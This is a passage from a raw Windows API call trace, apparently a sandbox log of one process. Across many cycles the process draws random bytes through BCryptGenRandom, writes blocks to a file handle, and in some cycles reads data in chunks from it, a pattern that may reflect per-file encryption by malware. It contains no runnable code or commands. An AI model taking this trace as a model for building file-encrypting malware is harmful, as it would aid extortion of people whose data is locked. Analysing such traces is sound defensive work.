lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.010] CloseHandle (hObject=0x170) returned 1 [0139.010] free (_Block=0x3df0008) [0139.010] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.017] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.018] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.018] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0139.018] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.018] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.018] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0139.018] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0139.018] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0139.019] free (_Block=0x3e305b8) [0139.019] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0139.019] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0139.019] free (_Block=0x1fa91d0) [0139.019] free (_Block=0x77d7a8) [0139.019] free (_Block=0x1fa90b8) [0139.019] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.019] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.020] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1ce0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.020] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.029] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x542c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.030] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.048] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x21e8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.048] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.057] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x287c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.058] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.067] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x35f0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.068] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.078] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2030, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.079] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.087] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2dc8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.088] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.088] CloseHandle (hObject=0x170) returned 1 [0139.088] free (_Block=0x3df0008) [0139.089] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.096] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.097] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.097] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0139.097] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.097] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.097] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0139.097] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0139.097] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0139.097] free (_Block=0x3e305b8) [0139.097] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0139.097] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0139.098] free (_Block=0x1fa91d0) [0139.098] free (_Block=0x77d7a8) [0139.098] free (_Block=0x1fa90b8) [0139.098] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.098] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.099] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1210, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.099] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.186] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x274c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.187] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.196] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x16b4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.196] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.197] CloseHandle (hObject=0x170) returned 1 [0139.197] free (_Block=0x3df0008) [0139.197] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.204] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.204] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.204] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0139.204] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.204] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.204] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0139.205] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0139.205] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0139.205] free (_Block=0x3e305b8) [0139.205] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0139.205] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0139.205] free (_Block=0x1fa91d0) [0139.205] free (_Block=0x77d7a8) [0139.205] free (_Block=0x1fa90b8) [0139.205] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.205] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.208] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x5c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.208] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.208] CloseHandle (hObject=0x170) returned 1 [0139.208] free (_Block=0x3df0008) [0139.208] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.216] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.216] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.216] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0139.216] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.217] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.217] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0139.217] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0139.217] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0139.217] free (_Block=0x3e305b8) [0139.217] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0139.217] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0139.217] free (_Block=0x1fa91d0) [0139.217] free (_Block=0x77d7a8) [0139.217] free (_Block=0x1fa90b8) [0139.217] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.218] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.219] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2e80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.219] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.219] CloseHandle (hObject=0x170) returned 1 [0139.219] free (_Block=0x3df0008) [0139.220] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.226] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.227] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.227] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0139.227] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.227] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.227] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0139.227] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0139.227] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0139.227] free (_Block=0x3e305b8) [0139.227] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0139.227] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0139.228] free (_Block=0x1fa91d0) [0139.228] free (_Block=0x77d7a8) [0139.228] free (_Block=0x1fa90b8) [0139.228] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.228] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.229] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4c90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.229] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.229] CloseHandle (hObject=0x170) returned 1 [0139.230] free (_Block=0x3df0008) [0139.230] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.239] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.240] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.240] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0139.240] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.240] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.240] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0139.240] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0139.240] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0139.240] free (_Block=0x3e305b8) [0139.240] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0139.240] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0139.241] free (_Block=0x1fa91d0) [0139.241] free (_Block=0x77d7a8) [0139.241] free (_Block=0x1fa90b8) [0139.241] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.241] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.241] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x870, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.241] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.250] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xd04, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.250] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.250] CloseHandle (hObject=0x170) returned 1 [0139.250] free (_Block=0x3df0008) [0139.250] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.274] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.275] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.275] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0139.275] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.275] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.275] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0139.275] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0139.275] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0139.275] free (_Block=0x3e305b8) [0139.275] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0139.275] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0139.276] free (_Block=0x1fa91d0) [0139.276] free (_Block=0x77d7a8) [0139.276] free (_Block=0x1fa90b8) [0139.276] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.276] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.302] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x35e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.302] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.303] CloseHandle (hObject=0x170) returned 1 [0139.303] free (_Block=0x3df0008) [0139.303] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.310] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.310] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0139.310] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.311] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0139.311] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0139.311] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0139.311] free (_Block=0x3e305b8) [0139.311] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0139.311] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0139.312] free (_Block=0x1fa91d0) [0139.312] free (_Block=0x77d7a8) [0139.312] free (_Block=0x1fa90b8) [0139.312] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.312] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.312] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.312] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.322] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1dd0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.323] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.323] CloseHandle (hObject=0x170) returned 1 [0139.324] free (_Block=0x3df0008) [0139.324] GetQueuedCompletionStatus (in: CompletionPort=0x14c, 